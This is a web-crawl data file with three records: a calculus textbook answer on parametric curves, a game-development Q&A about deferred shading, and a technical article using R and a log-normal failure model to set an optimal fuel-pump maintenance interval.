{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 5, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7659258246421814, "perplexity": 1360.4272591764275}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057427.71/warc/CC-MAIN-20210923165408-20210923195408-00517.warc.gz"}
|
http://www.gradesaver.com/textbooks/math/calculus/calculus-8th-edition/chapter-10-parametric-equations-and-polar-coordinates-review-true-false-quiz-page-729/7
|
# Chapter 10 - Parametric Equations and Polar Coordinates - Review - True-False Quiz: 7
False
#### Work Step by Step
The first pair of equations only gives the right half of the parabola , that is, $y=x^{2}$. whereas the second pair of equations traces outs the whole parabola. For example: First case: when $x=t^{2}, y=t^{4}$ Then $(x,y)=(1,1)$ at $t=1$ and $(x,y)=(1,1)$ at $t=-1$ Second case: when $x=t^{3}, y=t^{6}$ Then $(x,y)=(1,1)$ at $t=1$ and $(x,y)=(-1,1)$ at $t=-1$ Thus, the second pair of equations traces outs the whole parabola , that is, $y=x^{2}$. Hence, the given statement is false.
After you claim an answer you’ll have 24 hours to send in a draft. An editor will review the submission and either publish your submission or provide feedback.
|
2018-04-20 22:31:58
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.885873556137085, "perplexity": 491.2525062494266}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-17/segments/1524125944742.25/warc/CC-MAIN-20180420213743-20180420233743-00337.warc.gz"}
|
https://gamedev.stackexchange.com/questions/48465/deferred-rendering-and-a-few-shading-functions/48468
|
# deferred rendering and a few shading functions
How to use a few shading functions together with deferred rendering (for example some objects are shaded based on a lighting equation, other get a fixed color) ? I draw a full screen quad when shading (later I want to add optimizations for point lights). I have some idea how to solve that problem: during a gbuffer stage a shading function id should be saved in one of the render targets. Then we can do something like this:
if(id == 0)
{
fragColor = shadingFun0(...);
}
else
{
fragColor = shadingFun1(...);
}
What do you think about that ?
## 1 Answer
I believe having a lot of ifs in a fragment shader could have a serious performance impact. You could probably use the stencil buffer for this purpose.
Or save up to 4 light types in the color channels of a separate rendertarget and do this: fragColor = shadingFun0(...) * texColor.r + shadingFun1(...) * texColor.b and so on.
Or as a hack, you can manipulate the normals of some objects, so the light equation returns a different color.
Or just do multiple passes, one for each light type. So one deferred shading pass, and then you just draw the other objects on the resulting FBO (keeping the depth buffer, I guess).
Also I'm not sure about this, but isn't the whole point of using deferred shading that you can use the best lighting model for everything?
• I agree. Not only is branching like that defeating the point, it's probably a lot less efficient. – jmegaffin Jan 31 '13 at 22:43
|
2019-11-22 00:43:54
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3006178140640259, "perplexity": 1919.4255900041487}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-47/segments/1573496671053.31/warc/CC-MAIN-20191121231600-20191122015600-00355.warc.gz"}
|
https://objectcomputing.com/resources/publications/sett/november-2015-extracting-value-from-data
|
# Extracting Value from Data
## Extracting Value from Data
By Mike Martinez, OCI Principal Software Engineer
November 2015
## Introduction
In this article, we present a model of how Big Data analytics works with an Industrial Internet of Things (IIoT) application. Our analysis revolves around a fictional gas station and convenience store chain, which we call Carmageddon.
Carmageddon represents a business that generates .
The business is made up of 700 gas stations in 20 cities, with a total of 7,000 gas pumps and 2,000 fuel tanks that have been acquired over time.
Our model simulates Carmageddon's operations.
Carmageddon is currently struggling with issues with:
• EPA compliance
• Climbing preventive maintenance costs
• Frequent outages due to breakdowns within their aging pump and tank infrastructure
A failed pump costs approximately $3K per day or$1M per year; an empty tank costs (in lost revenue) $7K per day or$2.5M per year.
Carmageddon's current approach to dealing with pump and tank failures is reactive. They would like to develop a strategy and approach that enables them to be proactive in preventing sales and revenue losses.
The proposed solution is to develop an IIoT ecosystem, which takes advantage of sensors that collect data from Carmageddon's pumps and tanks and stream data to a cloud-based analytics engine, which predicts tank and pump failures and thereby empowers the business to avoid unexpected failures and losses in revenue.
This solution is demonstrated and may be viewed at: http://carma.demo.ociweb.com/.
In this article we will describe the analytics involved in establishing a maintenance interval for the fuel pumps. This solution minimizes the total cost of repairs within the context of a system that uses cloud-based processing to gather and ingest large amounts of data, present them in a useful fashion, and utilize analytic methods to generate value from the gathered data.
What follows includes a quick exploration of failure models, with the selection of a likely candidate for our model.
After that we generate some synthetic test data using the theoretical model, which will allow us to evaluate our data analysis processing. We will create an analysis mechanism that allows us to estimate model parameters given only data that we can actually collect. The simulated data is then applied to the parameter estimation mechanisms to evaluate their performance.
Once we have a model, simulated data for that model, and a processing mechanism that allows us to estimate the model parameters from measurable data, we will explore how we can use the model to predict equipment failures and how these predictions can be used to reduce the cost of failures in the corporation. This involves evaluating the different contributions to costs for failures and determining how to select a maintenance interval reducing these costs to an overall minimum.
## Overview
The first step is to derive a suitable model that determines when the simulated pumps will fail.
Next, we process our simulated data with the date of inception – when the pumps were new or last repaired – and the age at which they will fail.
From there, we illustrate how the model parameters are estimated from data and show the accuracy of this estimation process using the generated simulation data.
Once we have the model and derived parameters from the simulated data, we determine the maintenance costs for repairing the pumps.
Note that we are identifying the minimum maintenance costs (by looking at data regarding maintenance costs at different maintenance intervals) and proactively scheduling maintenance (as opposed to reacting to the actual breakdowns). This effectively reduces the amount of data that we have for estimating the parameters. Therefore, once we start the new maintenance intervals, we will need to spend a greater amount of time before reaching the same confidence in our estimated parameters.
Once we have examined the costs without using scheduled maintenance and then optimized the interval for scheduled maintenance, we obtain results that show a positive value for implementing the scheduled maintenance:
• Implementing scheduled maintenance results in a savings of 43.6% (costs are 56.4% of the base case).
• Implementing scheduled maintenance saves $1,052.48 per pump annually, or$7.4M for the corporation.
After we obtain these results, we discuss some of the issues that might arise, as well as some cautions about use of the model and subsequent parameter estimation.
## Fuel Pump Reliability
In order to determine maintenance costs for the fuel pumps, the reliability of the pumps must be modeled. Since this is a demonstration project, we can make many simplifying assumptions without losing the ability to illustrate the techniques involved in doing this.
Some conditions that we ignore include the specifics of how failures occur. We can also characterize the types of failure as an aggregate average cost for maintenance actions, rather than attempting to identify each failure case or repair result. We can also lump all of the different component lifetimes into a single time-to-failure value that represents the aggregate average over all of the components.
## Pump Survival
Pump survival to a specific age is defined as the probability that a pump has not failed when it achieves that age. Each pump fails with a probability defined by a probability density function (PDF) characteristic of the pumps. Using different density functions results in different survival curves for the pumps.
Modeling pump failures consists of assigning an initial age (date of installation or repair) to each pump, then determining failure points using the model.
Note that, once a model has been selected, processing of the inbound actual data consists of estimating the model parameters from the observed data. Predictions can then be made using the model with the best-fit parameters.
We consider two models here:
1. A constant hazard rate model
2. A log-normal failure rate model
Using R code to perform the modeling and simulation for this analysis, we start by setting up some useful values to be used. Among the variables we create include a mean time to failure (MTTF) value and a volatility estimate, which anticipates the model that we might use.
MTTF is a common way to express the average time we expect will elapse before a product fails. That is, half of the failures will occur before this time, and half will occur after this time. It does not constrain the actual shape of the failures over time in any way.
The volatility estimate is a mechanism that we can use to indicate how much randomness is included in the failures. That is, a higher volatility allows a model to include failures that clump together more often that a model with lower volatility. This value will be applied differently for different models.
# Repeatabilityrandom_seed <- 2112set.seed(random_seed) # Plotting X variable (months)grid <- seq(0,40,0.1) # Probability scale valuesquantiles <- seq(0,1,by=0.01) # Corporation parametersannual_revenue <- 2000000000population <- 7000 # Modeled time to failure and variabilitymttf <- 34exp_sigma <- 1.2 # Additional useful valuescurrent_time <- Sys.time()epoch='1970-1-1'seconds_per_day <- 24 * 60 * 60days_per_year <- 365months_per_year <- 12days_per_month <- round(days_per_year/months_per_year)
Failure rate models can be simple or complex. We opt for a model that is as simple as possible, while still useful. For complex products, failure rates can be created by combining failure models for smaller, simpler elements of those products. This results in very complex failure models for these products. If we accept some margin, between what a model predicts and how failures may actually occur, more simple failure models may be used to approximate more complex models.
A common failure rate model frequently used is the bathtub failure rate model. This model includes a high failure rate early in the life of a product, followed by a long period with a relatively low failure rate, then an increasing failure rate at what is referred to as end-of-life.
For our model, we simplify by assuming the high early failure rate is not present due to the suppliers performing “burn-in” testing. This kind of testing is specifically designed to weed out products that will fail early. What remains is a long period with a low failure rate followed by increasing failures at the end of the products lifetime.
Failure rate models have several interesting properties associated with them, including:
Probability density function the probability that a single failure will occur at a specific time (age) Cumulative density function the proportion of a population that will fail up to a specific time Survival function the proportion of a population that will not fail up to a specific time Hazard function the probability that a single failure will occur in the surviving population at a specific time
We will consider two models here.
1. The first is the constant hazard rate model, which is a common failure model used to estimate how long a product will last.
2. The second is a log-normal failure model, which has a low failure rate followed by a period where the rate increases steeply.
### Constant Hazard Rate Model
The simplest failure density function is the constant hazard rate, where survival is characterized by the exponential density function. This failure rate density function includes the MTTF value, but does not include any allowance for volatility.
\begin{aligned} (1)\quad & f(t) = \lambda \mathrm{e}^{-\lambda t} & \quad\text{Probability density function} \\ (2)\quad & F(t) = 1 - \mathrm{e}^{-\lambda t} & \quad\text{Cumulative density function} \\ (3)\quad & S(t) = 1 - F(t) = \mathrm{e}^{-\lambda t} & \quad\text{Survival function} \\ (4)\quad & h(t) = \frac{f(t)}{S(t)} = \lambda & \quad\text{Hazard function} \\ \end{aligned}
exp_rate <- log(1/2)/mttfpexp_working <- exp( exp_rate * grid)
A survival curve for this density function appears as:
We expect fuel pumps to last for a time, then fail predominantly after they reach an age where components begin to wear out. The constant hazard rate model assumes that failures occur throughout the product lifetime at a regular rate.
Clearly the constant hazard rate model does not reflect the expected failure behaviors for the pumps.
### Log-Normal Failure Rate Model
The log-normal probability distribution may be used to create a failure rate model that more closely resembles the right side of the typical failure rate “bathtub” characteristic curve describing hardware failures. The relevant formulas describing the model include:
\begin{aligned} (5)\quad & f(t) = \frac{\phi \left(\frac{\mathrm{ln}(t) - \mu}{\sigma} \right)}{ \sigma t } & \quad\text{Probability density function} \\ (6)\quad & F(t) = \Phi \left( \frac{\mathrm{ln}(t) - \mu}{\sigma} \right) & \quad\text{Cumulative density function} \\ (7)\quad & S(t) = 1 - F(t) = 1 - \Phi \left( \frac{\mathrm{ln}(t) - \mu}{\sigma} \right) & \quad\text{Survival function} \\ (8)\quad & h(t) = \frac{f(t)}{S(t)} = \frac{ \phi \left( \frac{ \mathrm{ln}(t) - \mu }{ \sigma} \right) }{ \sigma t \left[ 1 - \Phi \left( \frac{\mathrm{ln}(t) - \mu}{\sigma} \right) \right] } & \quad\text{Hazard function} \\ \end{aligned}
where
\begin{aligned} (9)\quad & \phi(u) = \frac{1}{\sqrt{2\pi}} \, \mathrm{e}^{^{-u^2}/_2} & \quad\text{Standard normal probability density function} \\ (10)\quad & \Phi(u) = \int\limits_{-\infty}^u \phi(z)\,\mathrm{d}z & \quad\text{Standard normal cumulative density function} \\ \end{aligned}
Modeling the survival function uses the log transformed variables:
# log-normal distribution with mu of 34 months, standard deviation of 1.2 months.mu <- log(mttf)sigma <- log(exp_sigma) survival <- function(mu,sigma) { plnorm( grid, mu, sigma, lower=F) }ln_hazard <- function(mu,sigma) { dlnorm( grid, mu, sigma) / survival(mu,sigma) }
The hazard function can be derived as the ratio of the failure probability to the survival probability. This function may be used to understand the probability of failure at a particular age. It represents the probability that a pump that has survived to an age will then fail at that age.
The hazard rate in this case is the tail end of the typical bathtub curve expected for pumps. If we assume the early failures are not present due to burn-in prior to purchase, the log-normal model is suitable for modeling the pump failures.
The log-normal density function results in a survival curve that more closely resembles actual failure characteristics:
## Generating Simulated Failures
As part of the demonstration, we need to generate simulated failures. We use these simulated failures to test the parameter estimation formulas that derive the parameters from data.
Simulating the hardware failures consists of identifying the inception date for each pump, then projecting the age that each pump will fail. The inception date is the date the pump is “new,” that is, the starting point of the aging calculations.
### Simulating Age at Failure
We can generate a simulated age at failure for all of our pumps using random variates from the log-normal distribution. To find each pump's age at the first failure, we generate one random value for each of the pumps:
fail_times <- rlnorm(population,mu,sigma)
Sorting these ages and plotting the portion of surviving population against the age at failure results in the following chart:
Note that this generated simulation data resembles the theoretical survival curve very well. We are confident that age at failure is generated correctly.
### Assigning Inception Dates
The inception date for each pump is simulated as if each pump was last replaced at a random time in relation to any other pump. This will be done by allowing the inception date for a pump range from MTTF months prior to now, up to now.
For any pump that fails prior to now, the inception date is moved to that failure date, and a new age to failure is generated. This results in random ages for all of the pumps.
The date of a simulated failure is the sum of the inception date and the age to failure. Since this procedure utilizes the age at failure, to possibly adjust the inception date, these dates are derived after the age at failure data is available.
inception_age <- runif(population,0,mttf*days_per_month)inception_dates <- as.POSIXct(current_time - seconds_per_day*inception_age,origin=epoch)inception_range <- range(inception_dates)inception_quarters <- seq(inception_range[1],inception_range[2],by="quarter")
The following histogram illustrates the distribution of inception times for the population prior to adjusting for failures earlier than now. The boxplot at the bottom shows that the distribution is uniform across the entire time period.
## Estimating Model Parameters
Once we have simulated data, we can use that as input data to simulate actual measurements and determine if we will be able to estimate the model parameters closely enough to be useful.
### Parameter Estimation Formulas
Estimating the actual parameter values for the log-normal model from measured sample data will be done using a maximum likelihood estimator for each of the two parameters. We will estimate the location ($$\hat{\mu}$$) and spread ($$\hat{\sigma}$$) parameters for the model. The exponentiation of these parameters is measured in time and can be used to characterise the age at failure for the pumps.
The values that are being used as input to the estimation formulas are the age at failure for each detected failure. This is the time at which a failure was detected to occur minus the time where the pump was considered "new". A pump is considered to be "new" when it is either replaced or repaired.
\begin{aligned} (11)\quad & \hat{\mu} = \frac{1}{n} \displaystyle\sum_{k=0}^n \mathrm{ln}(t_{fail,k} - t_{0,k}) & \quad\text{location estimation} \\ (12)\quad & \hat{\sigma} = \sqrt { \frac{1}{n} \displaystyle\sum_{k=0}^n \big( \mathrm{ln}(t_{fail,k} - t_{0,k}) - \hat{\mu} \big)^2 } & \quad\text{spread estimation} \\ \end{aligned}
Note that the input data to these estimation formulas are not directly available from actual input data. The simulated data provides this information directly.
When receiving actual measurement data, failures need to be detected first. This will be done by applying a threshold to the amount of time between sensor readings and when a reading has not been received from a sensor within this time, the associated pump will be considered to have failed. Once a failure has been detected in this way, then the inception age (last repair or replace date) will be subtracted from the current date, when the failure was detected, and the result used as the age at failure in the parameter estimation formulas.
### Parameter Estimation Performance
We examine the estimated values of the parameters, referenced back to the non-log-normal values for generated simulation data. To do so, we generate a rolling window of the observed input data for the parameters as the data is received. This gives an intuition of how the values will behave when collecting actual measurement data.
library(zoo)window <- 50rolling_mu <- exp(rollapply(fail_times,window,estimate_mu,partial=T))rolling_sigma <- exp(rollapply(fail_times,window,estimate_sigma,partial=T)) mu_range <- range(rolling_mu)max_mu <- mu_range[2]min_mu <- mu_range[1]mu_error <- max(abs(mu_range-mttf)) sigma_range <- range(rolling_sigma)max_sigma <- sigma_range[2]min_sigma <- sigma_range[1]var_error <- max(abs(sigma_range-exp(sigma))) model_conditions <- matrix( c( log(mttf), log(max_mu), log(max_mu), log(min_mu), log(min_mu), sigma, log(max_sigma), log(min_sigma), log(max_sigma), log(min_sigma)), ncol = 2)
The plot below shows the estimated mu parameter value (translated back into months) over the first 7,000 generated data points using a 50 sample window. During this time, the estimate ranges from a low of 31.2 to a high of 36.7 months. The largest error from the actual value is 2.81 (8.26%) months.
The plot below shows the estimated sigma parameter value (translated back into months) over the first 7,000 generated data points using a 50 sample window. During this time, the estimate ranges from a low of 1.14 to a high of 1.26 months. The largest error from the actual value is 0.0634 (5.28%) months.
Comparing the survival curve of the actual age profile with the profiles derived from the estimated parameters, we can see in the chart below that the shape of the survival curve fits well, and the estimation errors bound the derived curve such that the actual curve lies within the estimated ones.
## Predictions Using the Model
Now that we have confidence in the simulation data, and the processes used to generate it, we can use the parameters estimated from that data to make some predictions.
The obvious useful prediction to make would be to estimate the age at failure, which the log-normal model estimates. So once we have the model parameters, we can estimate when pumps will fail and perform preventative maintenance, such as replacing aging pumps, prior to the actual failure.
To utilize the prediction model for the age at which pumps will fail, we will determine the costs of repairing or replacing the pumps. Then we will find when to schedule maintenance so that the total maintenance cost is minimized.
The maintenance interval is the independent variable that we optimize using the cost as the metric. The optimal value is the desired maintenance interval, and the cost of performing maintenance at that interval will result in the lowest achievable cost.
Once we select a maintenance interval, we can determine the per pump cost for the maintenance and compare that to the case where we do no scheduled maintenance. This will allow us to determine if, and if so by how much, scheduling maintenance on the pumps will reduce overall costs.
When we schedule maintenance for pumps at a certain age, it is likely that some of the pumps will fail prior to this scheduled time. There will be no reduction in costs for these pumps. Likewise there will be no increase in their maintenance cost either.
Also, preventative maintenance prior to an actual failure will result in useful life of replaced components not being utilized, which is a cost as well. These costs must be balanced by any gains realized through scheduled maintenance compared to unscheduled, emergency, repairs.
To start the prediction process, we can observe the model characteristic that allows us to determine the age at which a proportion of the entire population, or quantile, will have failed. This is the inverse of the cumulative probability function:
\begin{aligned} (13)\quad & t = F^{-1}(q) & \quad\text{Inverse cumulative density function} \\ \end{aligned}
Using this formula allows us to determine the age to schedule preventative maintenance, allowing a known portion of pumps to fail prior to this interval. The x-axis in the chart below is the quantile, or proportion of failed pumps, for which we are finding the predicted age.
# Bind the model parameter estimates to the predictions.prediction <- function(q) { qlnorm(q, mu, sigma) }
### Maintenance Costs
In order to determine when to schedule maintenance actions, we consider the costs for pump maintenance. Once we determine the total cost of maintenance actions at various maintenance intervals, we minimize the cost to find the interval for scheduling the maintenance actions.
To determine the cost of an individual repair, we find the average of all costs over the entire pump population. Costs to consider include: cost to repair or replace a pump, loss of revenue from a pump that is being repaired, and the loss from not utilizing the pump's full lifetime by repairing or replacing the pump before it fails.
It may be simpler to understand the cost components by analogy.
The predictions made here are similar to scheduling tire replacement. The mileage on any given tire is specific to that tire – tires are replaced as necessary and not as a group; this is similar to the age at which we perform maintenance on the pumps.
If we wait until the pumps fail, that corresponds to not replacing a tire until it goes flat. Clearly not a desirable outcome. If we schedule a tire to be replaced at a particular mileage, that corresponds to performing scheduled maintenance at a certain pump age. The cost of replacing a tire includes the cost of the replacement tire, plus labor costs, plus loss of use of the tire while it is being replaced. For the tire, loss of use is represented by miles not driven by the tire; for the pump, the loss is the time between when a repair or replacement was performed, and when the pump would have failed on its own (without maintenance).
• $$C_{\mathrm{pump}} \, = \, \2,000.00 \,$$ – cost of a new pump (replacement cost)
If a maintenance action requires a pump replacement, this is the maximum cost for the maintenance action.
• $$C_{\mathrm{repair}} \, = \, 60\% \, C_{\mathrm{pump}} \, = \, \1,200.00$$ – average non-replacement maintenance cost
This is the aggregate average over the entire pump population for the cost of maintenance that does not require pump replacement. This proportion holds for both scheduled and unscheduled maintenance actions.
• $$p_{\mathrm{replace}} \, = \, 20\%$$ – proportion of maintenance actions that require the pump to be replaced
This is the proportion of all repairs that require pump replacement.
• $$p_{\mathrm{discount}} \, = \, 80\%$$ – scheduled maintenance cost as a proportion of unscheduled maintenance costs
This is a reduction in maintenance costs due to the ability to leverage bulk supplier buying power andscheduled purchases, as well as the ability to schedule labor costs rather than paying a premium for unscheduled, emergency labor.
• $$mttr_{\mathrm{unscheduled}} \, = \, 7 \, \mathrm{days}$$ – mean time to repair (MTTR) for unscheduled maintenance
This is the period of time that includes: pump failure, detection of pump failure, time to schedule and repair the pump, plus the time to return the pump to operation.
• $$mttr_{\mathrm{scheduled}} \, = \, 2 \, \mathrm{days}$$ – mean time to repair (MTTR) for scheduled maintenance
This is the period of time that includes: start to completion of a scheduled maintenance plus the time to return the pump to operation.
### Repair Costs
The cost of a repair for any pump will include the parts and labor for the repair. If the repair is done on a scheduled basis, then the cost should be adjusted to account for the shorter interval (on average) requiring more maintenance (on average) than would be incurred for repairs only performed on pumps which had failed.
<h3">Parts and Labor Costs
An unscheduled maintenance action cost will be the cost of a new pump times the number of new pumps needed, plus the cost of repair times the number of pumps repaired:
\begin{aligned} (14)\quad & C_{\mathrm{unscheduled}} = p_{\mathrm{replace}} \, C_{\mathrm{pump}} \, + \, ( 1 - p_{\mathrm{replace}} ) \, C_{\mathrm{repair}} & \quad\text{Cost of unscheduled maintenance action} \\ & = 0.2 \, \times \, 2,000.00 \, + 0.8 \, \times \, 1,200.00 & \\ & = 1,360.00 & \\ \end{aligned}
Scheduled maintenance costs are similar to the unscheduled costs, but have a lower cost for parts and labor:
\begin{aligned} (15)\quad & C_{\mathrm{scheduled}} = p_{\mathrm{discount}} \, C_{\mathrm{unscheduled}} & \quad\text{Cost of scheduled maintenance action} \\ & = 0.8 \, \times \, 1,360.00 & \\ & = 1,088.00 & \\ \end{aligned}
With these two repair costs available, the repair cost as a function of the quantile of failed pumps may be derived, and from there we calculate the repair cost as a function of the maintenance interval.
\begin{aligned} (16)\quad & C_{\mathrm{maintenance}} = q \, C_{\mathrm{unscheduled}} \, + \, ( 1 - q ) \, C_{\mathrm{scheduled}} & \quad\text{Cost of maintenance action} \\ & \, = F(t) \, C_{\mathrm{unscheduled}} \, + \, S(t) \, C_{\mathrm{scheduled}} & \\ & \, = C_{\mathrm{unscheduled}} \, \left( p_{\mathrm{discount}} \, + ( 1 - p_{\mathrm{discount}} ) \, F(t) \right) & \\ & \, = \1,360.00 \, \times \, \big( 0.8 \, + 0.2 \, \times \, F(t) \big) \, = \, \272.00 \, \times \, F(t) \, + \, \1,088.00 & \\ \end{aligned}
# Sequences of time values to plot against.xvalues <- 1.2*mttf*quantiles # Maintenance costs given maintenance intervalc_maintenance <- function(t,mu,sigma) { 272 * plnorm(t,mu,sigma) + 1088 }
This cost as a function of the maintenance interval for the theoretical model, as well as the bounds of estimated model parameters, is shown in the chart below:
### Adjustment Due to Shorter Intervals
Since we are proposing to perform maintenance actions – and incur maintenance costs – prior to pumps actually failing, we need to account for the loss of use of the un-failed portion of the pump's lifetime.
For example, if we simply repaired each pump each week, we would not expect any failures, but we would be paying for 147 weeks (34 months), on average, of repairs. Compare that with paying only one time if we waited for the pump to fail on its own (with no scheduled maintenance).
Remembering the tire analogy, we can think of this as the per-mile cost of the tire, times the number of miles not driven. For the pumps, this is the per-month cost of the maintenance, times the amount of time that the pump is notused.
The amount of time the pump is not used may be estimated by the MTTF value. The per-month cost for the pump is simply the cost of a maintenance event, which is identified in equation (16) as $$C_{\mathrm{maintenance}}$$, divided by the interval at which this cost is incurred. We can either compare the per-month costs for all maintenance actions or use some other common time frame.
Since companies typically account for costs annually or quarterly, we can use either of these time frames as a reference. Here, we will use annual costs, so we can simply multiply the monthly cost (maintenance costs divided by the age (in months) at which the maintenance is performed) by 12 (months in a year).
\begin{aligned} (17)\quad & C_{\mathrm{adjusted}} = & 12 \, \times \, \left( \frac{C_\mathrm{maintenance}(t_{\mathrm{interval}})}{t_{\mathrm{interval}}} \right) & \quad\text{Annualized cost of early repair} \\ \end{aligned}
# Maintenance costs given maintenance intervalc_adjusted <- function(t,mu,sigma) { 12 * c_maintenance(t,mu,sigma) / t }
The chart below illustrates this cost and shows that this is the element of cost that penalizes early maintenance with a very high cost for short intervals.
### Lost Revenue
The time when a pump is out of service – either for a scheduled maintenance event or for an emergency repair after failure – represents the loss of revenue from that pump. This is considered a cost and must be accounted for when determining the cost of scheduling maintenance for pumps.
In the assumptions, we can see that scheduled outages are much shorter (2 days) than outages due to failures (7 days). This is due to the additional time to detect the failure and schedule the repair. The actual repair time will be the same for both. The revenue lost during an outage is:
\begin{aligned} (18)\quad & C_{\mathrm{repair time}}(t) = \frac{\mathrm{Revenue}}{n_{\mathrm{total}}} \, \times \, t & \quad\text{Lost revenue for a repair} \\ & = \, \782.78 \, \times \, t & \text{[per pump per day]} \\ \end{aligned}
The cost of lost revenue for repairing or maintaining a pump depends on the number of repairs after failure(s), and the number of maintenance events prior to failures. This proportion is the quantile that we have used before.
\begin{aligned} (19)\quad & C_{\mathrm{lost revenue}} & = q \, C_{\mathrm{repair time}} \left( mttr_{\mathrm{unscheduled}} \right) & \quad\text{Cost due to lost revenue} \\ & & + \left( 1 - q \right) \, C_{\mathrm{repair time}} \left( mttr_{\mathrm{scheduled}} \right) & \\ & & = \782.78 \, \times \big( 2 \, {\mathrm{days}} \, + \, q \, \left( 5 \, {\mathrm{days}} \right) \big) & \\ \end{aligned}
And now we can use the cumulative distribution to translate the formula from the quantiles to the maintenance interval. Since we want to be able to combine this cost with the maintenance cost calculated above, we go ahead and annualize the cost here as well.
\begin{aligned} (20)\quad & C_{\mathrm{lost revenue}} & = \frac{12}{t} \, \782.78 \, \times \big( 2 \, {\mathrm{days}} \, + \, 5 \, {\mathrm{days}} \, \times \, F(t) \big) & \quad\text{Cost due to lost revenue} \\ \end{aligned}
# Maintenance costs given maintenance intervalc_lostrevenue <- function(t,mu,sigma) { 12 * 782.78 * ( 2 + 5 * plnorm(t,mu,sigma)) / t }
### Total Maintenance Cost
Once we have determined the annualized cost to perform the maintenance, and the cost for not having the pumps available during maintenance, we can simply combine the costs to determine the annual cost per pump. This may be compared with the cost of not performing scheduled maintenance, and highlights the benefit of scheduled maintenance. The total cost is the sum of the individual costs:
\begin{aligned} (21)\quad & C_{\mathrm{total}} \, = \, & C_{\mathrm{adjusted}} \, + \, C_{\mathrm{lost revenue}} & \quad\text{Total cost per pump} \\ \end{aligned}
We can determine the maintenance cost incurred in the absence of any scheduled repairs by setting the maintenance interval to MTTF and the percentage of failed pumps to 100% in the above formulas. The degenerate formulas for no scheduled maintenance are:
\begin{aligned} (17a)\quad & C_{\mathrm{adjusted}} \, = \, \1,360.00 \, \times \, \left( \frac{12}{\mathrm{MTTF}} \right) \, = \, \480.00 & \quad\text{Annualized cost of repair} \\ \end{aligned}
\begin{aligned} (19a)\quad & C_{\mathrm{lost revenue}} \, = \, \782.78 \, \times \, 7 \, = \, \5,479.46 & \quad\text{Per pump per repair} \\ & \5,479.46 \, \times \, \left( \frac{12}{\mathrm{MTTF}} \right) \, = \, \1,933.93 & \quad\text{Annualized} \\ \end{aligned}
Resulting in a total cost prior to scheduling maintenance of:
\begin{aligned} (22)\quad & C_{\mathrm{total}} \, = & \, \480.00 \, + \, \1,933.93 \, = \, \2,413.03 & \quad\text{Annual cost per pump} \\ & C_{\mathrm{entire}} \, = & \, n_{\mathrm{total}} \, \times \, \2,413.03 \, = \16,897,510.00 & \quad\text{Total annualized revenue for repairs} \\ \end{aligned}
Now that we have a cost for repairs without schedule maintenance, we can find the cost with scheduled maintenance and then identify the optimum maintenance age for the pumps, as well as the total annualized cost of repairs (to compare scheduled v. non-scheduled).
total_cost <- function(t,mu,sigma) { c_adjusted(t,mu,sigma) + c_lostrevenue(t,mu,sigma)} min_costs <- apply( model_conditions, 1, function(r) optimize(total_cost,c(15,mttf),r[1],r[2],tol=0.01))
The annualized cost per pump, per year, for the nominal case is 1,360.85. The maintenance interval at the minimum cost (prescribed repair age) is 25.8 months. Annualized and summed over all of the pumps, the cost becomes: \begin{aligned} (23)\quad & C_{\mathrm{total}} \, = & \, \1,360.85 & \quad\text{Annual cost per pump} \\ & C_{\mathrm{entire}} \, = & \, n_{\mathrm{total}} \, \times \, \1,360.85 \, = \9,525,950.00 & \quad\text{Total annualized revenue for repairs} \\ \end{aligned} ## Discussion and Cautions To summarize the results: • When not performing scheduled maintenance (repairing pumps only after failure), the annual cost is2,413.03 per pump, or $16.9M for the entire business. • When performing scheduled maintenance at an interval of 25.8 months, the annual cost is$1,360.85 per pump, or $9.5M for the entire business. • Implementing scheduled maintenance results in a savings of 43.6% (costs are 56.4% of the base case). • Implementing scheduled maintenance saves$1,052.48 per pump annually, or \$7.4M for the corporation.
